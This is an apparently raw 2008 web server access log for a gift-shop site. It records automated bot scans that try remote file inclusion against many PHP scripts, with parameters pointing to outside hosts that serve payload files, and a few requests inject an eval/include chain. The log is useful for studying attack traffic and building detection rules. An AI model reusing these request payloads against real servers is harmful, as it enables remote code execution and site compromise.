67.19.6.34 - - [27/Aug/2008:06:41:27 -0700] "GET /logs/access.log/?dirDepth=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
67.19.6.34 - - [27/Aug/2008:06:41:27 -0700] "GET /?dirDepth=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "morningstargifts.com"
67.19.6.34 - - [27/Aug/2008:06:41:27 -0700] "GET /logs/?dirDepth=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "morningstargifts.com"
209.172.55.178 - - [27/Aug/2008:06:41:39 -0700] "GET /?dirDepth=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "morningstargifts.com"
209.172.55.178 - - [27/Aug/2008:06:41:39 -0700] "GET /logs/?dirDepth=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.811" "morningstargifts.com"
209.172.55.178 - - [27/Aug/2008:06:41:40 -0700] "GET /logs/access.log/?dirDepth=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
62.87.154.41 - - [27/Aug/2008:06:42:14 -0700] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:06:42:27 -0700] "GET /logs/scripts.log/errors.php?error=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:06:42:27 -0700] "GET /errors.php?error=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.119.195.22 - - [27/Aug/2008:06:42:29 -0700] "GET /logs/access_080606.log/errors.php?error=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:06:42:31 -0700] "GET /logs/errors.php?error=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:06:43:12 -0700] "GET /logs/access.log/?dirDepth=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:06:43:13 -0700] "GET /?dirDepth=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:06:43:13 -0700] "GET /logs/?dirDepth=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "morningstargifts.com"
66.103.128.44 - - [27/Aug/2008:06:43:45 -0700] "GET /logs/tasks/send_queued_emails.php?root_path=http://www.wichtl.at/files/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.morningstargifts.com"
66.103.128.44 - - [27/Aug/2008:06:43:45 -0700] "GET /tasks/send_queued_emails.php?root_path=http://www.wichtl.at/files/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.morningstargifts.com"
202.145.97.59 - - [27/Aug/2008:06:44:27 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
202.145.97.59 - - [27/Aug/2008:06:44:28 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
83.19.144.26 - - [27/Aug/2008:06:45:16 -0700] "GET //config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "morningstargifts.com"
212.42.42.42 - - [27/Aug/2008:06:45:40 -0700] "GET //admin/classes/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
64.185.237.191 - - [27/Aug/2008:06:45:41 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://hong.webcf.net/shop/upload/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.morningstargifts.com"
64.185.237.191 - - [27/Aug/2008:06:45:41 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://hong.webcf.net/shop/upload/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.morningstargifts.com"
64.185.237.191 - - [27/Aug/2008:06:45:41 -0700] "GET //index.php?DOCUMENT_ROOT=http://hong.webcf.net/shop/upload/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.morningstargifts.com"
202.145.97.59 - - [27/Aug/2008:06:47:47 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "morningstargifts.com"
202.145.97.59 - - [27/Aug/2008:06:47:42 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "morningstargifts.com"
202.145.97.59 - - [27/Aug/2008:06:47:43 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:06:47:48 -0700] "GET /logs/access.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
89.111.176.11 - - [27/Aug/2008:06:48:30 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:06:48:37 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
222.233.52.18 - - [27/Aug/2008:06:48:38 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
67.19.6.34 - - [27/Aug/2008:06:48:43 -0700] "GET /?dirDepth=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "morningstargifts.com"
66.187.101.14 - - [27/Aug/2008:06:48:45 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
66.187.101.14 - - [27/Aug/2008:06:48:51 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
66.187.101.14 - - [27/Aug/2008:06:48:56 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
65.254.49.34 - - [27/Aug/2008:06:49:00 -0700] "GET /logs/?dirDepth=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.810" "www.morningstargifts.com"
65.254.49.34 - - [27/Aug/2008:06:49:00 -0700] "GET /logs/?dirDepth=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.810" "www.morningstargifts.com"
65.254.49.34 - - [27/Aug/2008:06:49:00 -0700] "GET /?dirDepth=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.morningstargifts.com"
65.254.49.34 - - [27/Aug/2008:06:49:00 -0700] "GET /?dirDepth=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:49:23 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:49:24 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:49:26 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
92.51.145.83 - - [27/Aug/2008:06:49:28 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
83.19.144.26 - - [27/Aug/2008:06:50:04 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
83.19.144.26 - - [27/Aug/2008:06:50:06 -0700] "GET //components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
83.19.144.26 - - [27/Aug/2008:06:50:51 -0700] "GET //config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
83.19.144.26 - - [27/Aug/2008:06:51:08 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
83.19.144.26 - - [27/Aug/2008:06:51:09 -0700] "GET //config/dbutil.bck.php?confdir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
65.254.58.42 - - [27/Aug/2008:06:52:04 -0700] "GET /logs/access_080710.log//include/write.php?dir=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:52:09 -0700] "GET /logs//http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:52:10 -0700] "GET //http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:52:13 -0700] "GET /logs//http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:52:14 -0700] "GET //http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:52:16 -0700] "GET /logs//http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:52:17 -0700] "GET //http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:52:17 -0700] "GET /logs//http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:52:18 -0700] "GET //http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:06:53:02 -0700] "GET /?dirDepth=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:53:18 -0700] "GET /logs//http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:53:19 -0700] "GET //http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:53:23 -0700] "GET /logs//http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
87.230.81.72 - - [27/Aug/2008:06:53:24 -0700] "GET //http://www.tramiche.org/l33tb1t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
89.111.176.11 - - [27/Aug/2008:06:53:26 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
89.111.176.11 - - [27/Aug/2008:06:53:26 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
89.111.176.11 - - [27/Aug/2008:06:53:26 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
89.111.176.11 - - [27/Aug/2008:06:53:26 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:53:56 -0700] "GET /logs//http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:53:56 -0700] "GET //http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:54:02 -0700] "GET //http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:54:02 -0700] "GET /logs//http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:54:06 -0700] "GET //http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:54:06 -0700] "GET /logs//http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:54:08 -0700] "GET //http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.morningstargifts.com"
67.228.116.50 - - [27/Aug/2008:06:54:08 -0700] "GET /logs//http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.morningstargifts.com"
125.243.112.13 - - [27/Aug/2008:06:54:09 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
213.252.17.105 - - [27/Aug/2008:06:54:31 -0700] "GET /logs/access_080714.log/errors.php?error=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
83.19.144.26 - - [27/Aug/2008:06:56:10 -0700] "GET //components/com_flyspray/startdown.php?file=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "morningstargifts.com"
217.23.156.220 - - [27/Aug/2008:06:56:24 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
217.23.156.220 - - [27/Aug/2008:06:56:24 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
217.23.156.220 - - [27/Aug/2008:06:56:24 -0700] "GET /logs/access.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
63.208.74.34 - - [27/Aug/2008:06:56:37 -0700] "GET /logs/access.log//index.php?meio=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
63.208.74.34 - - [27/Aug/2008:06:56:37 -0700] "GET //index.php?meio=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
63.208.74.34 - - [27/Aug/2008:06:56:38 -0700] "GET /logs//index.php?meio=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
217.23.156.220 - - [27/Aug/2008:06:57:06 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
217.23.156.220 - - [27/Aug/2008:06:57:06 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
77.221.130.3 - - [27/Aug/2008:06:58:12 -0700] "GET /logs/access_080719.log/errors.php?error=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
83.222.30.248 - - [27/Aug/2008:06:58:54 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
83.222.30.248 - - [27/Aug/2008:06:58:54 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
83.222.30.248 - - [27/Aug/2008:06:58:54 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:06:59:04 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:06:59:04 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
91.186.30.30 - - [27/Aug/2008:06:59:19 -0700] "GET /logs/access.log/?dirDepth=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "morningstargifts.com"
91.186.30.30 - - [27/Aug/2008:06:59:20 -0700] "GET /?dirDepth=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "morningstargifts.com"
91.186.30.30 - - [27/Aug/2008:06:59:20 -0700] "GET /logs/?dirDepth=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 200 4942 "-" "libwww-perl/5.808" "morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:59:30 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:59:31 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:59:31 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:59:31 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:59:32 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
62.87.154.41 - - [27/Aug/2008:06:59:32 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
212.227.65.79 - - [27/Aug/2008:06:59:32 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
89.108.68.56 - - [27/Aug/2008:07:00:18 -0700] "GET /logs/access.log/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
89.108.68.56 - - [27/Aug/2008:07:00:18 -0700] "GET /logs/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
89.108.68.56 - - [27/Aug/2008:07:00:19 -0700] "GET /errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:07:00:47 -0700] "GET /errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:07:00:47 -0700] "GET /logs/access.log/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
201.130.79.39 - - [27/Aug/2008:07:00:47 -0700] "GET /logs/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
213.165.80.16 - - [27/Aug/2008:07:00:47 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://albgroup.webng.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.morningstargifts.com"
213.165.80.16 - - [27/Aug/2008:07:00:47 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://albgroup.webng.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.morningstargifts.com"
89.108.68.56 - - [27/Aug/2008:07:01:41 -0700] "GET /logs/access.log/?custompluginfile[]=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
89.108.68.56 - - [27/Aug/2008:07:01:42 -0700] "GET /?custompluginfile[]=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.morningstargifts.com"
89.108.68.56 - - [27/Aug/2008:07:01:42 -0700] "GET /logs/?custompluginfile[]=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.morningstargifts.com"
91.186.30.30 - - [27/Aug/2008:07:01:49 -0700] "GET /logs/?dirDepth=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 200 4942 "-" "libwww-perl/5.808" "www.morningstargifts.com"
91.186.30.30 - - [27/Aug/2008:07:01:50 -0700] "GET /?dirDepth=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:07:02:40 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:07:02:40 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:07:02:44 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:07:02:54 -0700] "GET /errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:07:02:54 -0700] "GET /logs/access.log/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:07:02:55 -0700] "GET /logs/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:07:03:01 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:07:03:01 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:07:03:01 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
12.192.82.221 - - [27/Aug/2008:07:03:23 -0700] "GET /logs/errors.php?error=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
